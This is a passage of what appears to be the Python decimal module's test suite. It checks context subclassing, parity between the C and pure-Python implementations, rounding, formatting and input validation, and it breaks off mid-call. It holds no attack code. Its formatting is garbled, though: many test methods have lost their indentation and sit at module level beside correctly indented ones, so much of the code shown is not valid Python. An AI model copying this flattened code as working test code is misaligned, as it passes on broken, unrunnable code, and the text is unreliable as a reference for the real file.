            for signal in (Inexact, Overflow, Rounded):
                self.assertTrue(c.flags[signal])

        # capitals
        self.assertRaises(ValueError, MyContext, **{'capitals':-1})
        c = MyContext(capitals=0)
        self.assertEqual(c.capitals, 0)
        x = c.create_decimal('1E222')
        self.assertEqual(c.to_sci_string(x), '1e+222')

        # clamp
        self.assertRaises(ValueError, MyContext, **{'clamp':2})
        c = MyContext(clamp=1, Emax=99)
        self.assertEqual(c.clamp, 1)
        x = c.plus(Decimal('1e99'))
        self.assertEqual(str(x), '1.000000000000000000000000000E+99')

        # flags
        self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
        c = MyContext(flags=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.flags[signal])
        c.clear_flags()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.flags[signal])

        # traps
        self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
        c = MyContext(traps=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.traps[signal])
        c.clear_traps()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
    # Run the subclassing tests against the C accelerator (_decimal).
    decimal = C
class PyContextSubclassing(ContextSubclassing):
    # Run the subclassing tests against the pure-Python implementation.
    decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
    """Check that the C and pure-Python implementations export the same
    module, Context and Decimal attributes."""

    def test_module_attributes(self):
        # Architecture dependent context limits
        self.assertEqual(C.MAX_PREC, P.MAX_PREC)
        self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
        self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
        self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)

        self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
        self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)

        self.assertEqual(C.__version__, P.__version__)

        self.assertEqual(dir(C), dir(P))

    def test_context_attributes(self):
        x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())

    def test_decimal_attributes(self):
        # BUG fix: both lists previously inspected C.Decimal, making the
        # comparison vacuous; the second list must inspect P.Decimal so
        # the C and Python APIs are actually compared.
        x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
    """repr() of a Context lists every attribute in canonical order."""
    ctx = self.decimal.DefaultContext.copy()

    ctx.prec = 425000000
    ctx.Emax = 425000000
    ctx.Emin = -425000000
    ctx.rounding = ROUND_HALF_DOWN
    ctx.capitals = 0
    ctx.clamp = 1
    # Clear every flag and trap so repr shows empty lists.
    for sig in OrderedSignals[self.decimal]:
        ctx.flags[sig] = False
        ctx.traps[sig] = False

    expected = ("Context(prec=425000000, rounding=ROUND_HALF_DOWN, "
                "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, "
                "flags=[], traps=[])")
    self.assertEqual(ctx.__repr__(), expected)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
    # Exercise the Coverage tests with the C accelerator module.
    decimal = C
class PyCoverage(Coverage):
    # Exercise the Coverage tests with the pure-Python module.
    decimal = P
class PyFunctionality(unittest.TestCase):
    """Extra functionality in decimal.py"""

    def test_py_alternate_formatting(self):
        # Issue 7094: alternate formatting ('#') keeps a trailing decimal
        # point for the e/f/g/% presentation types.
        # (Removed an unused `localcontext = P.localcontext` binding.)
        Decimal = P.Decimal

        # triples giving a format, a Decimal, and the expected result
        test_values = [
            # Issue 7094: Alternate formatting (specified by #)
            ('.0e', '1.0', '1e+0'),
            ('#.0e', '1.0', '1.e+0'),
            ('.0f', '1.0', '1'),
            ('#.0f', '1.0', '1.'),
            ('g', '1.1', '1.1'),
            ('#g', '1.1', '1.1'),
            ('.0g', '1', '1'),
            ('#.0g', '1', '1.'),
            ('.0%', '1.0', '100%'),
            ('#.0%', '1.0', '100.%'),
        ]
        for fmt, d, result in test_values:
            self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
    """White box testing for decimal.py"""

    def test_py_exact_power(self):
        # Rarely exercised lines in _power_exact.
        # Several results below are deliberately unchecked: the calls only
        # exist to execute specific branches for coverage.
        Decimal = P.Decimal
        localcontext = P.localcontext

        with localcontext() as c:
            c.prec = 8
            x = Decimal(2**16) ** Decimal("-0.5")
            self.assertEqual(x, Decimal('0.00390625'))

            x = Decimal(2**16) ** Decimal("-0.6")
            self.assertEqual(x, Decimal('0.0012885819'))

            x = Decimal("256e7") ** Decimal("-0.5")

            x = Decimal(152587890625) ** Decimal('-0.0625')
            self.assertEqual(x, Decimal("0.2"))

            x = Decimal("152587890625e7") ** Decimal('-0.0625')

            x = Decimal(5**2659) ** Decimal('-0.0625')

            c.prec = 1
            x = Decimal("152587890625") ** Decimal('-0.5')

            c.prec = 201
            x = Decimal(2**578) ** Decimal("-0.5")

    def test_py_immutability_operations(self):
        # Do operations and check that it didn't change internal objects.
        Decimal = P.Decimal
        DefaultContext = P.DefaultContext
        setcontext = P.setcontext

        c = DefaultContext.copy()
        c.traps = dict((s, 0) for s in OrderedSignals[P])
        setcontext(c)

        d1 = Decimal('-25e55')
        b1 = Decimal('-25e55')
        d2 = Decimal('33e+33')
        b2 = Decimal('33e+33')

        def checkSameDec(operation, useOther=False):
            # eval() is safe here: `operation` is always one of the fixed
            # method-name strings listed below, never external input.
            if useOther:
                eval("d1." + operation + "(d2)")
                self.assertEqual(d1._sign, b1._sign)
                self.assertEqual(d1._int, b1._int)
                self.assertEqual(d1._exp, b1._exp)
                self.assertEqual(d2._sign, b2._sign)
                self.assertEqual(d2._int, b2._int)
                self.assertEqual(d2._exp, b2._exp)
            else:
                eval("d1." + operation + "()")
                self.assertEqual(d1._sign, b1._sign)
                self.assertEqual(d1._int, b1._int)
                self.assertEqual(d1._exp, b1._exp)

        Decimal(d1)
        self.assertEqual(d1._sign, b1._sign)
        self.assertEqual(d1._int, b1._int)
        self.assertEqual(d1._exp, b1._exp)

        checkSameDec("__abs__")
        checkSameDec("__add__", True)
        checkSameDec("__divmod__", True)
        checkSameDec("__eq__", True)
        checkSameDec("__ne__", True)
        checkSameDec("__le__", True)
        checkSameDec("__lt__", True)
        checkSameDec("__ge__", True)
        checkSameDec("__gt__", True)
        checkSameDec("__float__")
        checkSameDec("__floordiv__", True)
        checkSameDec("__hash__")
        checkSameDec("__int__")
        checkSameDec("__trunc__")
        checkSameDec("__mod__", True)
        checkSameDec("__mul__", True)
        checkSameDec("__neg__")
        checkSameDec("__bool__")
        checkSameDec("__pos__")
        checkSameDec("__pow__", True)
        checkSameDec("__radd__", True)
        checkSameDec("__rdivmod__", True)
        checkSameDec("__repr__")
        checkSameDec("__rfloordiv__", True)
        checkSameDec("__rmod__", True)
        checkSameDec("__rmul__", True)
        checkSameDec("__rpow__", True)
        checkSameDec("__rsub__", True)
        checkSameDec("__str__")
        checkSameDec("__sub__", True)
        checkSameDec("__truediv__", True)
        checkSameDec("adjusted")
        checkSameDec("as_tuple")
        checkSameDec("compare", True)
        checkSameDec("max", True)
        checkSameDec("min", True)
        checkSameDec("normalize")
        checkSameDec("quantize", True)
        checkSameDec("remainder_near", True)
        checkSameDec("same_quantum", True)
        checkSameDec("sqrt")
        checkSameDec("to_eng_string")
        checkSameDec("to_integral")

    def test_py_decimal_id(self):
        # Decimal(Decimal) produces a new (equal) object.
        Decimal = P.Decimal

        d = Decimal(45)
        e = Decimal(d)
        self.assertEqual(str(e), '45')
        self.assertNotEqual(id(d), id(e))

    def test_py_rescale(self):
        # Coverage
        Decimal = P.Decimal
        localcontext = P.localcontext

        with localcontext() as c:
            x = Decimal("NaN")._rescale(3, ROUND_UP)
            self.assertTrue(x.is_nan())

    def test_py__round(self):
        # Coverage
        Decimal = P.Decimal

        self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
    """Extra functionality in _decimal"""

    @requires_extra_functionality
    def test_c_ieee_context(self):
        # issue 8786: Add support for IEEE 754 contexts to decimal module.
        IEEEContext = C.IEEEContext
        DECIMAL32 = C.DECIMAL32
        DECIMAL64 = C.DECIMAL64
        DECIMAL128 = C.DECIMAL128

        def assert_rest(self, context):
            # Common invariants of all IEEE interchange contexts.
            self.assertEqual(context.clamp, 1)
            assert_signals(self, context, 'traps', [])
            assert_signals(self, context, 'flags', [])

        c = IEEEContext(DECIMAL32)
        self.assertEqual(c.prec, 7)
        self.assertEqual(c.Emax, 96)
        self.assertEqual(c.Emin, -95)
        assert_rest(self, c)

        c = IEEEContext(DECIMAL64)
        self.assertEqual(c.prec, 16)
        self.assertEqual(c.Emax, 384)
        self.assertEqual(c.Emin, -383)
        assert_rest(self, c)

        c = IEEEContext(DECIMAL128)
        self.assertEqual(c.prec, 34)
        self.assertEqual(c.Emax, 6144)
        self.assertEqual(c.Emin, -6143)
        assert_rest(self, c)

        # Invalid values
        self.assertRaises(OverflowError, IEEEContext, 2**63)
        self.assertRaises(ValueError, IEEEContext, -1)
        self.assertRaises(ValueError, IEEEContext, 1024)

    @requires_extra_functionality
    def test_c_context(self):
        # Contexts can be constructed directly from raw signal bitmasks.
        Context = C.Context

        c = Context(flags=C.DecClamped, traps=C.DecRounded)
        self.assertEqual(c._flags, C.DecClamped)
        self.assertEqual(c._traps, C.DecRounded)

    @requires_extra_functionality
    def test_constants(self):
        # Condition flags
        cond = (
            C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
            C.DecDivisionImpossible, C.DecDivisionUndefined,
            C.DecFpuError, C.DecInexact, C.DecInvalidContext,
            C.DecInvalidOperation, C.DecMallocError,
            C.DecFloatOperation, C.DecOverflow, C.DecRounded,
            C.DecSubnormal, C.DecUnderflow
        )

        # IEEEContext
        self.assertEqual(C.DECIMAL32, 32)
        self.assertEqual(C.DECIMAL64, 64)
        self.assertEqual(C.DECIMAL128, 128)
        self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)

        # Conditions: each flag is a distinct bit.
        for i, v in enumerate(cond):
            self.assertEqual(v, 1<<i)

        self.assertEqual(C.DecIEEEInvalidOperation,
                         C.DecConversionSyntax|
                         C.DecDivisionImpossible|
                         C.DecDivisionUndefined|
                         C.DecFpuError|
                         C.DecInvalidContext|
                         C.DecInvalidOperation|
                         C.DecMallocError)

        self.assertEqual(C.DecErrors,
                         C.DecIEEEInvalidOperation|
                         C.DecDivisionByZero)

        self.assertEqual(C.DecTraps,
                         C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
    def test_c_context_repr(self):
        # This test is _decimal-only because flags are not printed
        # in the same order.
        DefaultContext = C.DefaultContext
        FloatOperation = C.FloatOperation

        c = DefaultContext.copy()

        c.prec = 425000000
        c.Emax = 425000000
        c.Emin = -425000000
        c.rounding = ROUND_HALF_DOWN
        c.capitals = 0
        c.clamp = 1
        # Turn on every signal (including FloatOperation, which is not in
        # OrderedSignals) so the repr lists the complete set.
        for sig in OrderedSignals[C]:
            c.flags[sig] = True
            c.traps[sig] = True
        c.flags[FloatOperation] = True
        c.traps[FloatOperation] = True

        s = c.__repr__()
        t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
            "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
            "flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
                   "FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
            "traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
                   "FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
        self.assertEqual(s, t)
    def test_c_context_errors(self):
        # Input validation of Context attributes and the SignalDict views.
        Context = C.Context
        InvalidOperation = C.InvalidOperation
        Overflow = C.Overflow
        FloatOperation = C.FloatOperation
        localcontext = C.localcontext
        getcontext = C.getcontext
        setcontext = C.setcontext
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)

        c = Context()

        # SignalDict: input validation
        self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
        self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
        self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
        self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
        self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
        self.assertRaises(TypeError, setattr, c,'traps', ['y'])
        self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
        self.assertRaises(KeyError, setattr, c, 'traps', {0:1})

        # Test assignment from a signal dict with the correct length but
        # one invalid key.
        d = c.flags.copy()
        del d[FloatOperation]
        d["XYZ"] = 91283719
        self.assertRaises(KeyError, setattr, c, 'flags', d)
        self.assertRaises(KeyError, setattr, c, 'traps', d)

        # Input corner cases
        int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
        gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9

        # prec, Emax, Emin
        for attr in ['prec', 'Emax']:
            self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
        self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)

        # prec, Emax, Emin in context constructor
        self.assertRaises(ValueError, Context, prec=gt_max_emax)
        self.assertRaises(ValueError, Context, Emax=gt_max_emax)
        self.assertRaises(ValueError, Context, Emin=-gt_max_emax)

        # Overflow in conversion
        self.assertRaises(OverflowError, Context, prec=int_max+1)
        self.assertRaises(OverflowError, Context, Emax=int_max+1)
        self.assertRaises(OverflowError, Context, Emin=-int_max-2)
        self.assertRaises(OverflowError, Context, clamp=int_max+1)
        self.assertRaises(OverflowError, Context, capitals=int_max+1)

        # OverflowError, general ValueError
        for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
            self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
            self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
            if sys.platform != 'win32':
                self.assertRaises(ValueError, setattr, c, attr, int_max)
                self.assertRaises(ValueError, setattr, c, attr, -int_max-1)

        # OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
        if C.MAX_PREC == 425000000:
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
                              int_max+1)
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
                              int_max+1)
            self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
                              -int_max-2)

        # ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
        if C.MAX_PREC == 425000000:
            self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
                              1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
                              1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
                              -1070000001)
            self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)

        # capitals, clamp
        for attr in ['capitals', 'clamp']:
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(ValueError, setattr, c, attr, 2)
            self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
            if HAVE_CONFIG_64:
                self.assertRaises(ValueError, setattr, c, attr, 2**32)
                self.assertRaises(ValueError, setattr, c, attr, 2**32+1)

        # Invalid local context
        self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
                          locals())
        self.assertRaises(TypeError, exec,
                          'with localcontext(context=getcontext()): pass',
                          locals())

        # setcontext: restore the saved context afterwards so other tests
        # are unaffected.
        saved_context = getcontext()
        self.assertRaises(TypeError, setcontext, "xyz")
        setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
    @requires_extra_functionality
    def test_c_context_errors_extra(self):
        # Input validation for the extra-functionality attributes
        # _allcr, _flags and _traps.
        Context = C.Context
        InvalidOperation = C.InvalidOperation
        Overflow = C.Overflow
        localcontext = C.localcontext
        getcontext = C.getcontext
        setcontext = C.setcontext
        HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)

        c = Context()

        # Input corner cases
        int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1

        # OverflowError, general ValueError
        self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
        self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
        if sys.platform != 'win32':
            self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
            self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)

        # OverflowError, general TypeError
        for attr in ('_flags', '_traps'):
            self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
            self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
            if sys.platform != 'win32':
                self.assertRaises(TypeError, setattr, c, attr, int_max)
                self.assertRaises(TypeError, setattr, c, attr, -int_max-1)

        # _allcr
        self.assertRaises(ValueError, setattr, c, '_allcr', -1)
        self.assertRaises(ValueError, setattr, c, '_allcr', 2)
        self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
        if HAVE_CONFIG_64:
            self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
            self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)

        # _flags, _traps
        for attr in ['_flags', '_traps']:
            self.assertRaises(TypeError, setattr, c, attr, 999999)
            self.assertRaises(TypeError, setattr, c, attr, 'x')
    def test_c_valid_context(self):
        # These tests are for code coverage in _decimal.
        DefaultContext = C.DefaultContext

        Clamped = C.Clamped
        Underflow = C.Underflow
        Inexact = C.Inexact
        Rounded = C.Rounded
        Subnormal = C.Subnormal

        c = DefaultContext.copy()

        # Exercise all getters and setters
        c.prec = 34
        c.rounding = ROUND_HALF_UP
        c.Emax = 3000
        c.Emin = -3000
        c.capitals = 1
        c.clamp = 0

        self.assertEqual(c.prec, 34)
        self.assertEqual(c.rounding, ROUND_HALF_UP)
        self.assertEqual(c.Emin, -3000)
        self.assertEqual(c.Emax, 3000)
        self.assertEqual(c.capitals, 1)
        self.assertEqual(c.clamp, 0)

        # Etiny = Emin - prec + 1; Etop = Emax - prec + 1.
        self.assertEqual(c.Etiny(), -3033)
        self.assertEqual(c.Etop(), 2967)

        # Exercise all unsafe setters
        if C.MAX_PREC == 425000000:
            c._unsafe_setprec(999999999)
            c._unsafe_setemax(999999999)
            c._unsafe_setemin(-999999999)
            self.assertEqual(c.prec, 999999999)
            self.assertEqual(c.Emax, 999999999)
            self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
    def test_c_integral(self):
        # to_integral / to_integral_value / to_integral_exact: argument
        # validation, rounding-mode argument and the Inexact trap.
        Decimal = C.Decimal
        Inexact = C.Inexact
        localcontext = C.localcontext

        x = Decimal(10)
        self.assertEqual(x.to_integral(), 10)
        self.assertRaises(TypeError, x.to_integral, '10')
        self.assertRaises(TypeError, x.to_integral, 10, 'x')
        self.assertRaises(TypeError, x.to_integral, 10)

        self.assertEqual(x.to_integral_value(), 10)
        self.assertRaises(TypeError, x.to_integral_value, '10')
        self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
        self.assertRaises(TypeError, x.to_integral_value, 10)

        self.assertEqual(x.to_integral_exact(), 10)
        self.assertRaises(TypeError, x.to_integral_exact, '10')
        self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
        self.assertRaises(TypeError, x.to_integral_exact, 10)

        with localcontext() as c:
            x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
            self.assertEqual(x, Decimal('100000000000000000000000000'))

            x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
            self.assertEqual(x, Decimal('100000000000000000000000000'))

            # Only the _exact variant signals Inexact.
            c.traps[Inexact] = True
            self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
    def test_c_funcs(self):
        # Invalid arguments
        Decimal = C.Decimal
        InvalidOperation = C.InvalidOperation
        DivisionByZero = C.DivisionByZero
        getcontext = C.getcontext
        localcontext = C.localcontext

        self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')

        self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
        self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
        self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")

        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), []
        )
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
        )
        self.assertRaises(
            TypeError,
